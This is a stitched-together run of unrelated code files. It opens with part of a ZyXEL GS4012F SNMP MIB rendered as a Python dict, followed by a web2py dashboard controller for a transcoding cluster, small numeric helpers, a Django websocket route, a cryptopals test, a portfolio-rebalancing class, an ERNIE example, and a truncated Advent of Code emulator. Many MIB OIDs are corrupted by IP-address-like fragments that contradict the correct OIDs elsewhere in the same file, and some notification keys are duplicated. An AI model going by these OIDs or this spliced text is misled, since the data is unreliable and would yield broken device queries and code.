"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "TimeTicks"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstTopologyChangesCount" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "Counter32"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60",
"status" : "current",
"description" :
""".""",
}, # table
"mstpXstPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1",
"status" : "current",
"linkage" : [
"mstpXstPortXstId",
"mstpXstPortIndex",
],
"description" :
""".""",
"reference>" :
""".""",
}, # row
"mstpXstPortXstId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.107.60.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "MstiOrCistInstanceIndex"},
},
"access" : "noaccess",
"description" :
"""0 means CIST.""",
}, # column
"mstpXstPortIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.192.168.127.12",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readonly",
"description" :
"""The value of mstpPortIndex of the Port
in mstpPortTable.""",
}, # column
"mstpXstPortEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.192.168.127.12",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
""".""",
}, # column
"mstpXstPortPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "255"
},
],
"range" : {
"min" : "0",
"max" : "255"
},
},
},
"access" : "readwrite",
"default" : "128",
"description" :
"""Port priority, in steps of 16.""",
}, # column
"mstpXstPortPathCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readwrite",
"description" :
""".""",
}, # column
"mstpXstPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"disabled" : {
"nodetype" : "namednumber",
"number" : "0"
},
"discarding" : {
"nodetype" : "namednumber",
"number" : "1"
},
"learning" : {
"nodetype" : "namednumber",
"number" : "2"
},
"forwarding" : {
"nodetype" : "namednumber",
"number" : "3"
},
"unknown" : {
"nodetype" : "namednumber",
"number" : "4"
},
},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstPortDesignatedRoot" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstPortDesignatedCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstPortDesignatedBridge" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstPortDesignatedPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.60.1.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpNotifications" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.70",
}, # node
}, # nodes
"notifications" : {
"eventOnTrap" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.2.1",
"status" : "current",
"objects" : {
"eventSeqNum" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventEventId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventName" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventSetTime" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventSeverity" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventInstanceType" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventInstanceId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventInstanceName" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventServAffective" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventDescription" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"trapPersistence" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"trapSenderNodeId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"sysObjectID" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""This trap is used to inform network management system that a delta
fault event (events that are automatically cleared) has occured
or a normal fault event (not automatically cleared) state has
been set on.
Objects are used as follows:
- eventSeqNum is the sequence number of the event. For normal
type of events must equal to the sequence number of the event
in the events table.
- eventEventId specifies what fault event has occured.
- eventName specifies the name of the fault event.
- eventSetTime indicates when fault event has occured
(delta events) or when fault has been set on (normal events).
- eventSeverity reports the severity level of the event.
- eventInstanceType indicates what kind of object is faulty.
- eventInstanceId specifies what instance is faulty.
- eventInstanceName may contain textual description for
the faulty object.
- eventServAffective specifies whether the event is
immediately service affcetive.
- eventDescription reports possible additional information about the event.
- trapPersistence tells whether this event is a delta or normal event.
- trapSenderNodeId specifies the node ID of the sending network element if
configuring it is supported for the network element, otherwise 0.
- sysObjectID specifies what kind of equipment reports the fault event.
For more information see the eventTable specification""",
}, # notification
"eventClearedTrap" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.37.2.2",
"status" : "current",
"objects" : {
"eventSeqNum" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventEventId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventSetTime" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventInstanceType" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"eventInstanceId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"trapRefSeqNum" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"trapSenderNodeId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
"sysObjectID" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""This trap is used to inform network management system that a normal
type fault event has been cleared (state set off).
Objects are used as follows:
- eventSeqNum is the sequence number of the this clearing event. Note that
the sequence number of the cleared event is reported in the trapRefSeqNum
object.
- eventEventId specifies what event has been cleared.
- eventSetTime indicates when fault event has been cleared.
- eventInstanceType indicates what kind of object has been
faulty.
- eventInstanceId specifies what instance has been faulty.
- trapRefSeqNum specifies the sequence number of the cleared event (i.e.
the sequence number was assigned for the event in the events table).
- trapSenderNodeId specifies the node ID of the sending network element if
configuring it is supported for the network element, otherwise 0.
- sysObjectID specifies what kind of equipment reports the clearing event.
For more information see the eventTable specification""",
}, # notification
"newRoot" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.2.1",
"status" : "current",
"objects" : {
"mrstpBridgeIndex" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""""",
}, # notification
"topologyChange" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.2.2",
"status" : "current",
"objects" : {
"mrstpBridgeIndex" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""""",
}, # notification
"newRoot" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.70.1",
"status" : "current",
"objects" : {
"mstpXstId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""""",
}, # notification
"topologyChange" : {
"nodetype" : "notification",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.70.2",
"status" : "current",
"objects" : {
"mstpXstId" : {
"nodetype" : "object",
"module" : "ZYXEL-GS4012F-MIB"
},
},
"description" :
"""""",
}, # notification
}, # notifications
}
| StarcoderdataPython |
3338270 | import numpy as np
def rmse(predictions, targets):
    """Return the root-mean-square error between two numeric array-likes.

    Parameters
    ----------
    predictions, targets : array_like
        Numeric sequences or ndarrays of the same (broadcastable) shape.

    Returns
    -------
    numpy floating scalar
        ``sqrt(mean((predictions - targets) ** 2))``.
    """
    # np.asarray generalizes the function to plain Python sequences,
    # not just ndarrays (the original required ndarray operands).
    diff = np.asarray(predictions) - np.asarray(targets)
    return np.sqrt(np.mean(diff ** 2))
1765942 | # -*- coding: utf-8 -*-
### required - do no delete
import sys
import os
import shutil
import gluon.contrib.simplejson
from datetime import datetime
sys.path.append(os.path.abspath('./../'))
from modules import fflock_globals
from modules import fflock_utility
# Hex colour palette for the HTML status tables rendered by the
# status_data_* / jobs_data_* callbacks below.
master_color = "#317b80"     # row background: Master servers/jobs
storage_color = "#609194"    # row background: Storage servers/jobs
warning_color = "#DD0000"    # row background: server with no live connection/share
slave_color = "#92dce0"      # row background: Slave servers/jobs (default)
busy_color = "#df1c1c"       # text colour: State == 1 (busy)
idle_color = "#000000"       # text colour: idle / default state
error_color = "#CC2222"      # text colour: job State > 2 (failed)
finished_color = "#28be9b"   # text colour: job State == 2 (finished)
def user(): return dict(form=auth())  # auth action (login/register/...); `auth` is framework-provided — presumably web2py, TODO confirm
def download(): return response.download(request,db)  # stream files stored via db upload fields
def call(): return service()  # entry point for registered services; `service` is framework-provided
### end requires
def index():
    """Default landing action: hand a static message to the view."""
    return {"message": "Index"}
def submit():
    """Render and process the job-submission form.

    Builds a web2py FORM (job type, input/output paths, encoder options)
    and validates it against the POSTed request; the outcome is reported
    via ``response.flash``.  ``FORM``/``TABLE``/``TR``/``INPUT``/``SELECT``
    and the validators are framework-injected globals — presumably web2py
    HTML helpers, TODO confirm.
    """
    form = FORM(TABLE(TR("Job Type:", SELECT('Transcode', 'Custom', _name="jobtype", requires=IS_IN_SET(['Transcode', 'Custom']))),
                      TR("Input:", INPUT(_type="text", _name="input", requires=IS_NOT_EMPTY())),
                      TR("Output", INPUT(_type="text", _name="output", requires=IS_NOT_EMPTY())),
                      TR("Pre-Options:", INPUT(_type="text", _name="preoptions")),
                      TR("Options", INPUT(_type="text", _name="options")),
                      TR("Encoder", SELECT('ffmpeg', 'ffmbc', 'avconv', _name="encoder", requires=IS_IN_SET(['ffmpeg', 'ffmbc', 'avconv']))),
                      TR("Compare Frame Count", INPUT(_type="checkbox", _name="framecount")),
                      TR("", INPUT(_type="submit", _value="SUBMIT"))))
    # accepts() validates the submission held in request against the form.
    if form.accepts(request, session):
        response.flash = "form accepted"
    elif form.errors:
        response.flash = "form is invalid"
    return dict(form=form, vars=form.vars)
def status():
    """Status page action; the view pulls its data from the ajax
    status_data_* callbacks defined in this controller."""
    return {}
def status_data_servers():
    """Ajax callback: build the servers status table as an HTML string.

    One colour-coded row per server (sorted by type), each followed by the
    jobs assigned to it (newest first).  Row background encodes server/job
    type, text colour encodes busy/idle/finished/error state.  Relies on
    the framework-injected ``db`` global and the module colour constants.
    """
    #servers = SQLTABLE(db().select(db.Servers.ServerType, db.Servers.State), headers='fieldname:capitalize')
    #servers = SQLFORM.grid(db.Servers, searchable=False, details=False, sortable=False, csv=False, formstyle="divs")
    servers = db(db.Servers).select()
    servertable = ""
    if not db(db.Servers).isempty():
        servertable = "<table id='box-table-a'>"
        servertable += "<thead><tr><th scope='col' id='ServerType'>Server Type</th><th scope='col' id='LocalIP'>Local IP</th><th scope='col' id='LocalIP'>Public IP</th></tr></thead>"
        #servertable += "<tfoot><tr><td>...</td></tr></tfoot>"
        servertable += "<tbody>"
        for server in servers.sort(lambda server: server.ServerType):
            serveruuid = server.UUID
            bgcolor = slave_color
            statecolor = idle_color
            if server.State == 1: statecolor = busy_color
            # Slaves show the warning colour unless at least one
            # connectivity record reports them connected.
            if server.ServerType == "Slave":
                bgcolor = warning_color
                connectivity = db(db.Connectivity.SlaveServerUUID == server.UUID).select()
                for connection in connectivity:
                    if connection.Connected == 1:
                        bgcolor = slave_color
            # Storage servers warn unless they expose at least one share.
            if server.ServerType == "Storage":
                bgcolor = warning_color
                storage = db(db.Storage.ServerUUID == server.UUID).select()
                for share in storage:
                    bgcolor = storage_color
            if server.ServerType == "Master":
                bgcolor = master_color
            servertable = servertable + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td>" + server.ServerType + "</td><td>" + server.LocalIP + "</td><td>" + server.PublicIP + "</td></tr>"
            # Append one indented row per job assigned to this server,
            # truncating long input/output paths to 25 characters.
            serverjobs = db(db.Jobs.AssignedServerUUID == serveruuid).select(orderby=~db.Jobs.CreatedTime)
            bgcolor = slave_color
            for serverjob in serverjobs:
                statecolor = idle_color
                bgcolor = slave_color
                if serverjob.State == 1: statecolor = busy_color
                elif serverjob.State == 2: statecolor = finished_color
                elif serverjob.State > 2: statecolor = error_color
                if serverjob.JobType == "Master": bgcolor = master_color
                if serverjob.JobType == "Storage": bgcolor = storage_color
                if serverjob.JobType == "Slave": bgcolor = slave_color
                servertable = servertable + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td style='padding-left:2em;'>" + serverjob.JobSubType + "</td><td nowrap='wrap' style='max-width:300px;'>" + ((str(serverjob.JobInput)[:25] + '..') if len(str(serverjob.JobInput)) > 25 else serverjob.JobInput) + "</td><td nowrap='wrap' style='max-width:300px;'>" + ((str(serverjob.JobOutput)[:25] + '..') if len(str(serverjob.JobOutput)) > 25 else serverjob.JobOutput) + "</td></tr>"
        servertable += "</tbody></table>"
    else:
        servertable = "<div>No servers are currently running.</div>"
    return servertable
def status_data_jobs():
    """Ajax callback: build the jobs table (Master jobs with their
    sub-jobs, newest first) as an HTML string.

    Relies on the framework-injected ``db`` global and the module colour
    constants.  Row background encodes job type; text colour encodes
    busy/finished/error state.
    """
    #jobs = SQLTABLE(db().select(db.Jobs.JobType, db.Jobs.JobSubType, db.Jobs.JobInput, db.Jobs.JobOutput, db.Jobs.State, db.Jobs.Assigned, db.Jobs.Progress), headers='fieldname:capitalize')
    #jobs = SQLFORM.grid(db.Jobs, searchable=False, details=False, sortable=False, csv=False)
    masterjobs = db(db.Jobs.JobType == "Master").select(orderby=~db.Jobs.CreatedTime)
    table = ""
    if not db(db.Jobs).isempty():
        table = "<table id='box-table-a'>"
        table += "<thead><tr><th scope='col' id='JobType'>Job Type</th><th scope='col' id='Job Sub-Type'>Action</th><th scope='col' id='Command'>Command</th></tr></thead>"
        #table += "<thead><tr><th scope='col' id='JobType'>Job Type</th><th scope='col' id='Job Sub-Type'>Sub-Type</th><th scope='col' id='Command'>Command</th></tr></thead>"
        #table += "<tfoot><tr><td>...</td></tr></tfoot>"
        table += "<tbody>"
        for masterjob in masterjobs:
            masteruuid = masterjob.UUID
            bgcolor = master_color
            statecolor = idle_color
            table = table + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td>" + masterjob.JobType + "</td><td>" + masterjob.JobSubType + "</td><td>" + masterjob.Command + "</td></tr>"
            #display sub-jobs for each master job
            subjobs = db(db.Jobs.MasterUUID == masteruuid).select(orderby=~db.Jobs.CreatedTime)
            bgcolor = slave_color
            for subjob in subjobs:
                statecolor = idle_color
                bgcolor = slave_color
                if subjob.State == 1: statecolor = busy_color
                elif subjob.State == 2: statecolor = finished_color
                elif subjob.State > 2: statecolor = error_color
                if subjob.JobType == "Master": bgcolor = master_color
                if subjob.JobType == "Storage": bgcolor = storage_color
                if subjob.JobType == "Slave": bgcolor = slave_color
                table = table + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td style='padding-left:2em;'>" + subjob.JobType + "</td><td>" + subjob.JobSubType + "</td><td>" + subjob.Command + "</td></tr>"
            # Blank spacer row after each master job's sub-jobs.
            table = table + "<tr><td><br><br></td><td></td><td></td></tr>"
        # Fix: the original never closed the table, emitting malformed HTML
        # (status_data_servers closes its table; this now matches it).
        table += "</tbody></table>"
    else:
        table = "<div>No jobs currently queued.</div>"
    return table
def status_data_storage():
    """Ajax callback: render the storage table (type + NFS paths) as HTML
    via the framework's SQLTABLE helper."""
    storage = SQLTABLE(db().select(db.Storage.StorageType, db.Storage.LocalPathNFS, db.Storage.PublicPathNFS), headers='fieldname:capitalize')
    #storage = SQLFORM.grid(db.Storage, searchable=False, details=False, sortable=False, csv=False)
    return storage.xml()
def status_data_connectivity():
    """Ajax callback: render the full Connectivity table as HTML via the
    framework's SQLTABLE helper."""
    connectivity = SQLTABLE(db().select(db.Connectivity.ALL), headers='fieldname:capitalize')
    #connectivity = SQLFORM.grid(db.Connectivity, searchable=False, details=False, sortable=False, csv=False)
    return connectivity.xml()
def manage():
    """Management page action."""
    return {"message": "manage"}


def help():
    """Help page action.  Shadows the builtin, but the name is the route
    the framework dispatches on, so it must stay."""
    return {"message": "help"}


def error():
    """Error page action; the view renders everything."""
    return {}
def my_upload():
    """Handle an ajax file upload posted as ``request.vars.pic``.

    Stores the file through the ``db.files.file`` upload field and returns
    a JSON-wrapped HTML fragment: an error box when the file name contains
    forbidden characters, otherwise a success box with a download link.
    ``request``/``response``/``db``/``T`` are framework-injected globals.
    """
    import re
    fileApp = request.vars.pic
    # Strip spaces up front so the stored name is URL-friendly.
    filename = fileApp.filename.replace(' ', '')
    result = ''
    http_host = ''
    # Reject file names containing shell/URL-hostile special characters.
    expression = '[*+~$&^#@!;:,|]'
    regex = re.compile(expression)
    if regex.search(filename):
        # Typo fix: "caracters" -> "characters".
        result = "Special characters NO!!! Nothing to do..."
        return response.json('<div class="error_wrapper">'
                             '<div id="title__error" class="error" style="display: inline-block;">'
                             + result +
                             '</div></div>')
    # store() renames the upload to a safe unique name; keep that name so
    # we can build the link without re-querying the table.
    stored_name = db.files.file.store(fileApp, filename)
    db.files.insert(file=stored_name, title=filename)
    # Honour reverse proxies: prefer the forwarded host when present.
    if request.env.http_x_forwarded_host:
        http_host = request.env.http_x_forwarded_host.split(':', 1)[0]
    else:
        http_host = request.env.http_host
    # Fix: the original fetched db(...).select(...)[-1] to recover the name
    # it had just inserted — racy under concurrent uploads. Use stored_name.
    result = T('Successfully! Here is the link: ')
    result += "<a href=http://" + http_host + '/' + request.application + '/' + request.controller + '/download/' + stored_name + ">Download</a>"
    return response.json('<div class="alert alert-success">'
                         + result +
                         '</div>')
def jobs():
    """Jobs page action; data arrives via the jobs_data_jobs callback."""
    return {}
def jobs_data_jobs():
    """Ajax callback for the jobs page: Master jobs with their sub-jobs,
    newest first, as an HTML table string.

    NOTE(review): near-duplicate of ``status_data_jobs`` (only the header
    row differs) — candidate for consolidation into a shared helper.
    """
    masterjobs = db(db.Jobs.JobType == "Master").select(orderby=~db.Jobs.CreatedTime)
    table = ""
    if not db(db.Jobs).isempty():
        table = "<table id='box-table-a'>"
        #table += "<thead><tr><th scope='col' id='JobType'>Job Type</th><th scope='col' id='Job Sub-Type'>Sub-Type</th><th scope='col' id='Command'>Command</th></tr></thead>"
        #table += "<tfoot><tr><td>...</td></tr></tfoot>"
        table += "<tbody>"
        for masterjob in masterjobs:
            masteruuid = masterjob.UUID
            bgcolor = master_color
            statecolor = idle_color
            table = table + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td>" + masterjob.JobType + "</td><td>" + masterjob.JobSubType + "</td><td>" + masterjob.Command + "</td></tr>"
            #display sub-jobs for each master job
            subjobs = db(db.Jobs.MasterUUID == masteruuid).select(orderby=~db.Jobs.CreatedTime)
            bgcolor = slave_color
            for subjob in subjobs:
                statecolor = idle_color
                bgcolor = slave_color
                if subjob.State == 1: statecolor = busy_color
                elif subjob.State == 2: statecolor = finished_color
                elif subjob.State > 2: statecolor = error_color
                if subjob.JobType == "Master": bgcolor = master_color
                if subjob.JobType == "Storage": bgcolor = storage_color
                if subjob.JobType == "Slave": bgcolor = slave_color
                table = table + "<tr ALIGN='left' STYLE='background:%s; color:%s; font-variant: small-caps;'>" % (bgcolor, statecolor) + "<td style='padding-left:2em;'>" + subjob.JobType + "</td><td>" + subjob.JobSubType + "</td><td>" + subjob.Command + "</td></tr>"
            # Blank spacer row after each master job's sub-jobs.
            table = table + "<tr><td><br><br></td><td></td><td></td></tr>"
        # Fix: the original never closed the table, emitting malformed HTML.
        table += "</tbody></table>"
    else:
        table = "<div>No jobs currently queued.</div>"
    return table
| StarcoderdataPython |
def get_newcases(cases, new):
    """Compute new-case totals from a newest-first case history.

    Fix: a dataset artifact (``1648528 | ``) fused into the ``def`` line
    made the original a syntax error; the logic itself is preserved.

    Parameters:
        cases: iterable of rows with a ``totcasos`` attribute (cumulative
            case count), newest first — TODO confirm ordering with caller.
        new: mapping with key ``'confirmados'`` (latest confirmed total).

    Returns:
        dict with ``'novoscasos'`` (new cases since the stored history) and
        ``'novoscasosmedia'`` (a scaled moving-average figure), or zeros
        when there is not enough history.
    """
    c = newcases = newcasesmedia = 0
    newst = []
    record = []
    for row in cases:
        record.append(row)
    for row in record:
        # NOTE(review): ``c`` is never incremented, so this break never
        # fires and the ``c == 0`` branch runs for every row — the loop
        # looks like it intended to cap at 14 rows. Preserved as-is.
        if c == 14:
            break
        if c == 0:
            newcases = int(row.totcasos)
        newst.append(row.totcasos)
    newst.insert(0, new['confirmados'])
    if len(newst) >= 15:
        for i in range(len(newst)):
            if i == 15:
                break
            # NOTE(review): at i == 0 this reads newst[-1] (wrap-around),
            # pairing the newest value with the oldest. Preserved as-is.
            newcasesmedia = newcasesmedia + (int(newst[i-1]) - int(newst[(i)]))
    else:
        processed = {'novoscasos': 0, 'novoscasosmedia': 0}
        return processed
    newcasesmedia = round((newcasesmedia/270)*100)
    newcases = new['confirmados'] - newcases
    processed = {'novoscasos': newcases, 'novoscasosmedia': newcasesmedia}
    return processed
def get_graph_data(db):
    """Collect the graph series (date, new cases, moving average, ICU)
    in chronological order from a newest-first record set.

    Each row must expose ``datagraph``, ``newcases``, ``newcasesmedia``
    and ``uti`` attributes.
    """
    rows = [row for row in db]
    series = {'datagraph': [], 'novoscasos': [], 'novoscasosmedia': [], 'uti': []}
    # Rows arrive newest-first; walk them backwards so the plotted series
    # reads left-to-right in time.
    for row in reversed(rows):
        series['datagraph'].append(row.datagraph)
        series['novoscasos'].append(row.newcases)
        series['novoscasosmedia'].append(row.newcasesmedia)
        series['uti'].append(row.uti)
    return series
3395568 | <reponame>AktanKasymaliev/django-video-hosting
from django.urls import path

from . import consumers

# Fix: a dataset artifact ("| StarcoderdataPython |") fused onto the
# closing bracket made this module a syntax error.
# WebSocket routes: one comments channel per video, handled by
# CommentsConsumer over ASGI.
websocket_urlpatterns = [
    path('ws/video/<int:video_id>/', consumers.CommentsConsumer.as_asgi()),
]
165941 | <reponame>douglasnaphas/cryptopals-py
import unittest
from set1.challenge2_fixed_XOR.s1c2 import S1C2
from parameterized import parameterized
class TestS1C2(unittest.TestCase):
    """Unit tests for Set 1 / Challenge 2: fixed XOR of equal-length hex strings."""

    @parameterized.expand([
        # (hex_a, hex_b, expected_hex_xor) — the Cryptopals challenge 2
        # reference vector, per the set1/challenge2 module path.
        ( "1c0111001f010100061a024b53535009181c",
          "686974207468652062756c6c277320657965",
          "746865206b696420646f6e277420706c6179" ),
    ])
    def test_fixed_XOR(self, a, b, expected):
        """fixed_XOR(a, b) returns the hex-encoded XOR of the two buffers."""
        self.assertEqual(S1C2.fixed_XOR(a, b), expected)
| StarcoderdataPython |
1743921 | import numpy as np
from .. import tools
from ..algo import Algo
class DynamicCRP(Algo):
    """Dynamic Constant Rebalanced Portfolio.

    Repeatedly re-solves for optimal constant-rebalanced weights over a
    (possibly rolling) window of history via ``tools.opt_weights``.
    """

    # NOTE(review): the original comment here said "use logarithm of
    # prices", but PRICE_TYPE is "ratio" — the algo is fed price ratios.
    PRICE_TYPE = "ratio"

    def __init__(self, n=None, min_history=None, **kwargs):
        # n: rolling-window length; None means use all available history.
        # kwargs: forwarded verbatim to tools.opt_weights on every step.
        self.n = n
        self.opt_weights_kwargs = kwargs
        # Default min_history to the window size, or 252 periods when no
        # window is given (presumably one trading year of daily data —
        # TODO confirm).
        if min_history is None:
            if n is None:
                min_history = 252
            else:
                min_history = n
        super().__init__(min_history=min_history)

    def init_weights(self, columns):
        """Return the starting portfolio: uniform weights scaled by
        ``max_leverage``, used until enough history accumulates."""
        m = len(columns)
        self._importances = np.zeros(m)
        # use uniform weights until you get enough history
        return self.opt_weights_kwargs.get("max_leverage", 1.0) * np.ones(m) / m

    def step(self, x, last_b, history):
        """Re-optimize on the last ``n`` rows of history (or all of it)
        and return the new weight vector."""
        # Recompute the data frequency from the index each step.
        self.opt_weights_kwargs["freq"] = tools.freq(history.index)
        hist = history.iloc[-self.n :] if self.n else history
        ws = tools.opt_weights(hist, **self.opt_weights_kwargs)
        return ws
| StarcoderdataPython |
149911 | <gh_stars>1-10
import numpy as np
import paddle.fluid.dygraph as D
from ernie.tokenizing_ernie import ErnieTokenizer
from ernie.modeling_ernie import ErnieModel
D.guard().__enter__() # activate paddle `dygraph` (imperative/eager) mode
model = ErnieModel.from_pretrained('ernie-1.0') # Try to get pretrained model from server, make sure you have network connection
# model.eval() drops the training path (no backward computation); inference only.
model.eval() # Put the loaded model into evaluation (eval) state: tells the framework we will only run forward passes — no gradients or backprop — which reduces memory usage.
tokenizer = ErnieTokenizer.from_pretrained('ernie-1.0')
ids, _ = tokenizer.encode('hello world')
ids = D.to_variable(np.expand_dims(ids, 0)) # insert extra `batch` dimension
pooled, encoded = model(ids) # eager execution
print(pooled.numpy()) # convert results to numpy
| StarcoderdataPython |
3332221 | <reponame>agral/CompetitiveProgramming
#!/usr/bin/env python3
"""
MIT License
Copyright (c) 2017 <NAME> (<EMAIL>)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
def emulate(seed=81):
    """Emulate the register-machine program: count composite numbers.

    The program walks register ``b`` through the arithmetic progression
    ``b0, b0+17, ..., b0+17000`` (inclusive), where
    ``b0 = seed * 100 + 100000``, and counts in ``h`` how many of those
    values are composite.

    Parameters:
        seed: the program's initial register value (default 81, matching
            the original hard-coded input, so ``emulate()`` is unchanged).

    Returns:
